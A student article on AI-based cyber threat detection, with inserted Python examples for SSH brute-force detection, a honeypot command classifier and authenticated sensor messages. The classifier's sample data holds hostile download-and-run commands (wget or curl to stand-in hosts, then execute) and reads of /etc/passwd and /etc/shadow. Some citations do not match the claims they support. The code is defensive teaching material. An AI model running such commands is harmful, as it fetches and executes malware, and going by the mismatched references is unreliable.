By: Dadapeer Agraharam Shaik, Student, Department of Computer Science and Technology, Madanapalle Institute of Technology and Science, Angallu, 517325, Andhra Pradesh.
————————————————————————————
Abstract: Modern computing environments require elaborate protection, because threats grow in number and sophistication together with the information technologies they target. AI-powered threat detection has emerged as a transformative approach that applies artificial intelligence to strengthen defensive mechanisms in cybersecurity. This paper identifies and discusses the components of AI-based threat detection, including machine learning, behavioural analysis and real-time data processing. By learning from large volumes of data, AI systems can recognise indicators of cyber threats and respond quickly and efficiently. The integration of artificial intelligence into cybersecurity does more than improve the speed and precision of detection; it also helps to offset the growing shortage of cybersecurity professionals. The paper also considers the advantages, limitations and prospects of AI-based threat detection, and argues that it is highly effective in safeguarding confidential data and preserving the integrity of the networks it protects.
Keywords: AI-Powered, Threat Detection, Cyber Security.
1. INTRODUCTION
The Internet of Things (IoT) has spread into many fields as the number of Internet-connected devices grows daily; as of 2021, about 35 billion IoT devices were installed worldwide. The increasing volume of data they handle and the ease of managing them remotely make them attractive targets for attackers. Most IoT devices run Linux and are administered over the network through Telnet or SSH, usually protected only by passwords. Attackers are well aware of these remote-access services and use brute-force attacks to guess credentials, gain a foothold and exfiltrate sensitive information from the organisations that own the devices. SSH exists precisely to provide remote access, and the traffic between client and server is encrypted; an attacker who obtains valid credentials benefits from the same encryption, because the commands issued inside the session are hidden from network-level inspection.
Examples of SSH-related incidents include the 2014 Sony Pictures breach, in which SSH keys were stolen, and the Kaiji malware of 2020, which brute-forced exposed SSH services. These incidents underline the importance of SSH security, in particular control over user access and over the commands executed in remote sessions.
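A concrete illustration of the brute-force problem described above. The following Python is an added example, not code from this article, from AI@NTDS or from any cited paper: it parses constructed OpenSSH auth-log lines and applies a sliding-window count of failed logins per source address, distinguishing a single-account brute force from a password spray across default IoT accounts and flagging a success that follows the failures. The window, threshold and spray values are assumptions to be tuned per site.

```python
"""Detect SSH brute-force and password-spraying activity in OpenSSH auth logs.

Added example (not code from the article or from AI@NTDS). The log lines are
constructed; the window, threshold and spray values are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# OpenSSH: "Failed|Accepted <method> for [invalid user] <user> from <ip> port <n> ssh2"
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)

WINDOW = timedelta(seconds=60)  # assumption: failures are counted within 60 s
THRESHOLD = 5                   # assumption: 5 failures in the window raise an alert
SPRAY_USERS = 3                 # assumption: >= 3 distinct usernames means spraying

# Constructed sample log (not from a real system): a single-user brute force that
# ends in a login, a password spray against default IoT accounts, and an admin
# who mistyped a password twice and then logged in with a key.
SAMPLE_LOG = """\
Mar  3 10:00:01 iot-gw sshd[1201]: Failed password for root from 203.0.113.5 port 51234 ssh2
Mar  3 10:00:03 iot-gw sshd[1203]: Failed password for root from 203.0.113.5 port 51236 ssh2
Mar  3 10:00:04 iot-gw sshd[1204]: Connection closed by 203.0.113.5 port 51236 [preauth]
Mar  3 10:00:06 iot-gw sshd[1205]: Failed password for root from 203.0.113.5 port 51240 ssh2
Mar  3 10:00:08 iot-gw sshd[1206]: Failed password for root from 203.0.113.5 port 51241 ssh2
Mar  3 10:00:10 iot-gw sshd[1207]: Failed password for root from 203.0.113.5 port 51244 ssh2
Mar  3 10:00:12 iot-gw sshd[1208]: Accepted password for root from 203.0.113.5 port 51247 ssh2
Mar  3 10:00:15 iot-gw sshd[1210]: Failed password for invalid user admin from 198.51.100.9 port 40001 ssh2
Mar  3 10:00:16 iot-gw sshd[1211]: Failed password for invalid user pi from 198.51.100.9 port 40002 ssh2
Mar  3 10:00:17 iot-gw sshd[1212]: Failed password for invalid user ubuntu from 198.51.100.9 port 40003 ssh2
Mar  3 10:00:18 iot-gw sshd[1213]: Failed password for invalid user support from 198.51.100.9 port 40004 ssh2
Mar  3 10:00:19 iot-gw sshd[1214]: Failed password for invalid user guest from 198.51.100.9 port 40005 ssh2
Mar  3 10:05:00 iot-gw sshd[1300]: Failed password for ops from 10.0.0.7 port 53000 ssh2
Mar  3 10:05:20 iot-gw sshd[1301]: Failed password for ops from 10.0.0.7 port 53001 ssh2
Mar  3 10:05:40 iot-gw sshd[1302]: Accepted publickey for ops from 10.0.0.7 port 53002 ssh2
"""


def parse_line(line):
    """Return a dict for login attempts, None for any other sshd line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        # syslog timestamps carry no year; fine for intra-day window arithmetic
        "ts": datetime.strptime(m["ts"], "%b %d %H:%M:%S"),
        "ok": m["result"] == "Accepted",
        "user": m["user"],
        "ip": m["ip"],
    }


def detect(lines, window=WINDOW, threshold=THRESHOLD):
    """Sliding-window count of failures per source IP; returns {ip: alert}."""
    events = sorted(filter(None, map(parse_line, lines)), key=lambda e: e["ts"])
    recent = defaultdict(list)   # ip -> failure timestamps still inside the window
    users = defaultdict(set)     # ip -> usernames tried
    alerts = {}
    for e in events:
        ip = e["ip"]
        if e["ok"]:
            # a success from a source that was already alerting is the real emergency
            if ip in alerts:
                alerts[ip]["success_after_failures"] = e["user"]
            continue
        q = recent[ip]
        q.append(e["ts"])
        users[ip].add(e["user"])
        while e["ts"] - q[0] > window:   # drop failures that fell out of the window
            q.pop(0)
        if len(q) >= threshold:
            kind = "password-spraying" if len(users[ip]) >= SPRAY_USERS else "brute-force"
            alert = alerts.setdefault(ip, {"first_seen": q[0], "success_after_failures": None})
            alert.update(kind=kind, failures=len(q), users=sorted(users[ip]))
    return alerts


if __name__ == "__main__":
    for ip, alert in detect(SAMPLE_LOG.splitlines()).items():
        print(ip, alert)
```

Running the file prints one alert for each attacking address; the admin at 10.0.0.7 stays below the threshold. The detector only finds the attack, it does not prevent it: on Linux-based devices the durable fix is to disable password authentication in sshd_config (PasswordAuthentication no) and use key-based logins.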
This paper presents the use of artificial intelligence to detect such commands, in the form of the AI@NTDS network threat detection system. The system is trained on a command dataset collected by a honeypot and sorted into classes. Its main objective is to identify the attacker's intent, using 52 features that combine message-based, host-based and geographic characteristics for the AI model to assess.
AI@NTDS is a three-level threat detection framework, and its reported results are very high: an accuracy of 99.2% and an F1-score of 99.8%. Feature importance analysis shows that Message Length, Execution File and Received Size contribute most to the detection of malicious behaviour, which makes the system effective at screening threats that arrive over remote network connections. Fig. 1 below shows the architecture of AI-powered threat detection [1].
Fig. 1 Architecture of AI-Powered Threat Detection
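To make the feature-engineering step concrete, the following Python is an added example and not the AI@NTDS code from [1]. It derives the three features the text names (Message Length, Execution File, Received Size) plus one host-based feature (whether the source lies in a trusted management network) and one geographic feature (a country code) from constructed honeypot session records, then trains a small categorical naive Bayes model as a stand-in for the paper's classifier. The records, country codes, trusted network and discretisation thresholds are all assumptions.

```python
"""Honeypot command features and a small intent classifier.

Added example (not the AI@NTDS code from [1]). Session records, country codes,
the trusted network and the bucket thresholds are constructed assumptions.
"""
import math
import re
from collections import Counter, defaultdict
from ipaddress import ip_address, ip_network

# Assumption: the organisation's own management network (host-based feature).
TRUSTED_NETS = [ip_network("10.0.0.0/8")]

# "Execution File": the command fetches or launches a binary
# (wget/curl/tftp, chmod, or running ./file after a separator).
EXEC_RE = re.compile(r"\b(?:wget|curl|tftp)\b|\bchmod\s+\S+|(?:^|[;&|]\s*)\./\S+")

# Constructed honeypot session records; "cc" is a made-up country code.
SESSIONS = [
    {"src": "203.0.113.5", "cc": "R1", "recv": 120000, "label": "malware",
     "cmd": "cd /tmp; wget http://198.51.100.7/x86 -O .s; chmod +x .s; ./.s"},
    {"src": "198.51.100.9", "cc": "R2", "recv": 4096, "label": "malware",
     "cmd": "curl -fsSL http://198.51.100.9/bot.sh | sh"},
    {"src": "203.0.113.21", "cc": "R1", "recv": 95000, "label": "malware",
     "cmd": "cd /var/tmp && wget http://203.0.113.77/arm7 && chmod 777 arm7 && ./arm7"},
    {"src": "198.51.100.30", "cc": "R2", "recv": 0, "label": "recon",
     "cmd": "uname -a; cat /proc/cpuinfo | grep name | wc -l"},
    {"src": "203.0.113.44", "cc": "R3", "recv": 0, "label": "recon",
     "cmd": "cat /etc/passwd"},
    {"src": "203.0.113.61", "cc": "R1", "recv": 0, "label": "recon",
     "cmd": "ls -la /; whoami; id"},
    {"src": "10.0.0.5", "cc": "LO", "recv": 0, "label": "benign",
     "cmd": "sudo systemctl restart nginx"},
    {"src": "10.0.0.6", "cc": "LO", "recv": 0, "label": "benign",
     "cmd": "tail -n 100 /var/log/syslog"},
    {"src": "10.0.0.7", "cc": "LO", "recv": 0, "label": "benign",
     "cmd": "df -h"},
]


def extract_features(rec):
    """Discretise one session record into categorical features."""
    n = len(rec["cmd"])          # Message Length
    recv = rec["recv"]           # Received Size (bytes the session pulled in)
    return {
        "length": "short" if n < 20 else "medium" if n < 60 else "long",
        "exec_file": bool(EXEC_RE.search(rec["cmd"])),
        "recv_size": "none" if recv == 0 else "small" if recv < 1024 else "large",
        "external": not any(ip_address(rec["src"]) in net for net in TRUSTED_NETS),
        "geo": rec["cc"],
    }


class NaiveBayes:
    """Categorical naive Bayes with add-one (Laplace) smoothing."""

    def __init__(self):
        self.labels = Counter()              # label -> number of training records
        self.counts = defaultdict(Counter)   # (feature, label) -> Counter of values
        self.values = defaultdict(set)       # feature -> values seen in training

    def fit(self, records):
        for rec in records:
            self.labels[rec["label"]] += 1
            for f, v in extract_features(rec).items():
                self.counts[(f, rec["label"])][v] += 1
                self.values[f].add(v)
        return self

    def predict(self, rec):
        feats = extract_features(rec)
        total = sum(self.labels.values())
        scores = {}
        for label, n in self.labels.items():
            lp = math.log(n / total)   # log prior
            for f, v in feats.items():  # smoothed log likelihood per feature
                lp += math.log((self.counts[(f, label)][v] + 1) / (n + len(self.values[f])))
            scores[label] = lp
        return max(scores, key=scores.get)


MODEL = NaiveBayes().fit(SESSIONS)


def classify(src, cc, cmd, recv):
    """Label a new honeypot session as malware, recon or benign."""
    return MODEL.predict({"src": src, "cc": cc, "cmd": cmd, "recv": recv})


if __name__ == "__main__":
    print(classify("198.51.100.23", "R2",
                   "wget http://203.0.113.80/mips -O /tmp/m; chmod +x /tmp/m; /tmp/m", 88000))
    print(classify("203.0.113.44", "R3", "cat /etc/shadow; uname -a", 0))
    print(classify("10.0.0.9", "LO", "sudo apt-get update", 0))
```

With nine hand-built records the model is only a teaching device; the point is the shape of the pipeline: raw honeypot sessions become a fixed feature vector, the categorical model is trained on labelled sessions, and new sessions are scored. In the example, the Execution File and Received Size features alone separate the download-and-run sessions from pure reconnaissance, which matches the feature-importance ranking reported for AI@NTDS.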
2. Threat Model
Smart devices are known for fairly weak security and fall to even simple attacks. Because IoT devices are heterogeneous and mostly resource-constrained, conventional network security solutions cannot protect IoT infrastructure on their own. The assumption that connected devices are implicitly trustworthy does not hold for IoT: an insecure device is easily compromised and then used to attack the other devices on the same network. This section gives a brief overview of threats that are constantly present in IoT networks.
A. Botnets
A botnet is a group of hijacked computing devices used for cybercrime and fraud. The bots are used in large, coordinated attacks for data theft, crashing servers and spreading malware. A botnet uses your devices for purposes such as defrauding people or causing disruption without your knowledge, and botnets are also used specifically to infiltrate network devices [2].
B. Denial of Service
In a denial-of-service (DoS) attack, the attacker prevents the intended user of a device (computer, phone, smartwatch, etc.) from carrying out normal activities. The mechanism is to flood the target with requests that serve no real purpose until genuine requests can no longer be handled. A DoS attack comes from a single source; when the same attack is launched from many different sources it is called a distributed denial-of-service (DDoS) attack.
C. Man in the Middle
A man-in-the-middle (MitM) attack intercepts the communication of user devices over the network, enabling replay and injection attacks. For example, a MitM attacker can eavesdrop on traffic from a user's smartphone and then turn off the home security system without authorisation.
D. Reconnaissance
A reconnaissance attack collects information about a specific target. The collected information is then used to plan a distinct attack that gains unauthorised access to a device or a network. Reconnaissance may be purely technical or may involve physical presence; it includes packet sniffing, ping sweeps and port scanning, phishing and social engineering, and searches of publicly available information on the Internet [3].
3. Model for Detecting and Mitigating Backdoor Attacks on Database Servers
This study addresses database backdoor attacks, in which the attacker causes malicious programs to be loaded into the target database in order to corrupt data and cause havoc in end-user networks; crafted SQL queries are used to extend the attack into the network [4]. Recent findings in computer security have highlighted this threat. To cover their tracks and gain unauthorised access, attackers exploit existing weaknesses in the authentication and networking components; other backdoor attacks take advantage of system flaws or query-handling flaws, with potentially disastrous results. Topologically, the research proposes placing an ensemble machine learning model between the Internet connection and the database so that it can screen queries and counter these hazards [5].
A related scheme for wireless sensor networks [6] requires authentication before a node can become the cluster head (CH) of its cluster, so that a malicious node cannot take over the cluster and its operation remains secure. In a second module, every sensor encrypts its data with a symmetric key before passing it to the CH; the CH processes the data securely and forwards it to the base station for aggregation. To keep the network operating securely, any compromised data is handled according to its timestamp values.
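The sensor-to-cluster-head exchange described above, as an added example that is not the SAPDA code from [6] and not part of this article. Each sensor protects its reading with a pre-shared symmetric key and a timestamp; the cluster head verifies the tag, rejects stale or replayed messages by their timestamps, and aggregates what survives for the base station. The keys, freshness window and message layout are assumptions. Integrity and origin are protected here with HMAC-SHA256; confidentiality of the reading, which the scheme also provides, would additionally need an AEAD such as AES-GCM, which Python's standard library does not include, so it is left out.

```python
"""Sensor-to-cluster-head messages with symmetric-key authentication and
timestamp checks.

Added example illustrating the mechanism in the text; not the SAPDA code from [6].
Keys, the freshness window and the message layout are assumptions. HMAC-SHA256
gives integrity and origin; an AEAD would be needed for confidentiality as well.
"""
import hashlib
import hmac
import struct

# Assumption: pre-shared per-sensor keys, also known to the cluster head (CH).
SENSOR_KEYS = {
    "s01": bytes.fromhex("00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff"),
    "s02": bytes.fromhex("ffeeddccbbaa99887766554433221100ffeeddccbbaa99887766554433221100"),
}
FRESHNESS_WINDOW = 30            # seconds a message may deviate from the CH clock (assumption)
HEADER = struct.Struct("!8sIi")  # sensor id (NUL-padded), unix timestamp, reading in milli-units
TAG_LEN = hashlib.sha256().digest_size


def sensor_send(sensor_id, reading, ts, key):
    """Sensor side: fixed-layout body followed by an HMAC tag over that body."""
    body = HEADER.pack(sensor_id.encode().ljust(8, b"\0"), ts, reading)
    return body + hmac.new(key, body, hashlib.sha256).digest()


class ClusterHead:
    """CH side: verify the tag, enforce freshness and monotonic timestamps, aggregate."""

    def __init__(self, keys, clock):
        self.keys = keys
        self.clock = clock          # callable returning current unix time (injectable for tests)
        self.last_ts = {}           # sensor id -> last accepted timestamp
        self.readings = []          # accepted (sensor id, ts, reading) tuples
        self.rejected = []          # (sensor id or None, reason)

    def receive(self, msg):
        if len(msg) != HEADER.size + TAG_LEN:
            return self._reject(None, "malformed")
        body, tag = msg[:HEADER.size], msg[HEADER.size:]
        sid_raw, ts, reading = HEADER.unpack(body)
        sid = sid_raw.rstrip(b"\0").decode(errors="replace")
        key = self.keys.get(sid)
        if key is None:
            return self._reject(sid, "unknown sensor")
        # constant-time comparison; the tag is checked before any timestamp logic,
        # so an attacker cannot probe the replay state with forged messages
        if not hmac.compare_digest(hmac.new(key, body, hashlib.sha256).digest(), tag):
            return self._reject(sid, "bad tag")
        if abs(self.clock() - ts) > FRESHNESS_WINDOW:
            return self._reject(sid, "stale")
        if ts <= self.last_ts.get(sid, -1):
            return self._reject(sid, "replay")
        self.last_ts[sid] = ts
        self.readings.append((sid, ts, reading))
        return True

    def _reject(self, sid, reason):
        self.rejected.append((sid, reason))
        return False

    def aggregate(self):
        """Mean of the accepted readings, the value forwarded to the base station."""
        return sum(r for _, _, r in self.readings) / len(self.readings)


NOW = 1_700_000_000  # constructed "current time" for the demonstration

if __name__ == "__main__":
    ch = ClusterHead(SENSOR_KEYS, lambda: NOW)
    good = sensor_send("s01", 21500, NOW - 1, SENSOR_KEYS["s01"])
    print(ch.receive(good), ch.receive(good))                       # True False (replay)
    print(ch.receive(sensor_send("s02", 0, NOW, b"wrong-key")))     # False (bad tag)
    print(ch.receive(sensor_send("s02", 22000, NOW, SENSOR_KEYS["s02"])))  # True
    print(ch.aggregate(), ch.rejected)
```

The ordering of the checks is the design point: authentication first, then the clock-based freshness window, then the per-sensor monotonic timestamp. A replayed or forged message therefore never reaches the aggregation step, which is how "compromised data is handled according to its timestamp values" becomes a concrete rule.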
Conclusion:
Artificial intelligence-based threat detection can therefore be regarded as an important step in the evolution of security. AI increases the capacity to detect and counter cyber threats efficiently through machine learning algorithms, behavioural analysis and real-time data processing. It adapts to large and varied data sets and identifies the patterns and anomalies that indicate threats, so that preventive and dynamic countermeasures can be taken. Used in security, AI strengthens protection against threats while reducing the manual effort required, which matters given the growing skills shortage in the cyber workforce. As AI technologies mature, their application will become even more critical in protecting digital infrastructure from constantly emerging cyber threats.
References:
[1] B.-X. Wang, J.-L. Chen, and C.-L. Yu, "An AI-Powered Network Threat Detection System," IEEE Access, vol. 10, pp. 54029–54037, 2022, doi: 10.1109/ACCESS.2022.3175886.
[2] M. Rahaman, F. Tabassum, V. Arya, and R. Bansal, "Secure and sustainable food processing supply chain framework based on Hyperledger Fabric technology," Cyber Secur. Appl., vol. 2, p. 100045, Jan. 2024, doi: 10.1016/j.csa.2024.100045.
[3] I. Bibi, A. Akhunzada, and N. Kumar, "Deep AI-Powered Cyber Threat Analysis in IIoT," IEEE Internet Things J., vol. 10, no. 9, pp. 7749–7760, May 2023, doi: 10.1109/JIOT.2022.3229722.
[4] L. Triyono, R. Gernowo, P. Prayitno, M. Rahaman, and T. R. Yudantoro, "Fake News Detection in Indonesian Popular News Portal Using Machine Learning For Visual Impairment," JOIV Int. J. Inform. Vis., vol. 7, no. 3, pp. 726–732, Sep. 2023, doi: 10.30630/joiv.7.3.1243.
[5] A. Khan and I. Sharma, "AI-Powered Detection and Mitigation of Backdoor Attacks on Databases Server," in 2024 2nd International Conference on Intelligent Data Communication Technologies and Internet of Things (IDCIoT), Jan. 2024, pp. 374–379, doi: 10.1109/IDCIoT59759.2024.10467487.
[6] N. Goyal, M. Dave, and A. K. Verma, "SAPDA: Secure Authentication with Protected Data Aggregation Scheme for Improving QoS in Scalable and Survivable UWSNs," Wirel. Pers. Commun., vol. 113, no. 1, pp. 1–15, Jul. 2020, doi: 10.1007/s11277-020-07175-8.
[7] P. Mishra, T. Jain, P. Aggarwal, G. Paul, B. B. Gupta, R. W. Attar, and A. Gaurav, "CloudIntellMal: An advanced cloud based intelligent malware detection framework to analyze android applications," Comput. Electr. Eng., vol. 119, p. 109483, 2024.
[8] S. Bai, S. Shi, C. Han, M. Yang, B. B. Gupta, and V. Arya, "Prioritizing user requirements for digital products using explainable artificial intelligence: A data-driven analysis on video conferencing apps," Future Gener. Comput. Syst., vol. 158, pp. 167–182, 2024.
Cite As
Shaik, D. A. (2024). AI-Powered Threat Detection: How It Works. Insights2Techinfo, pp. 1.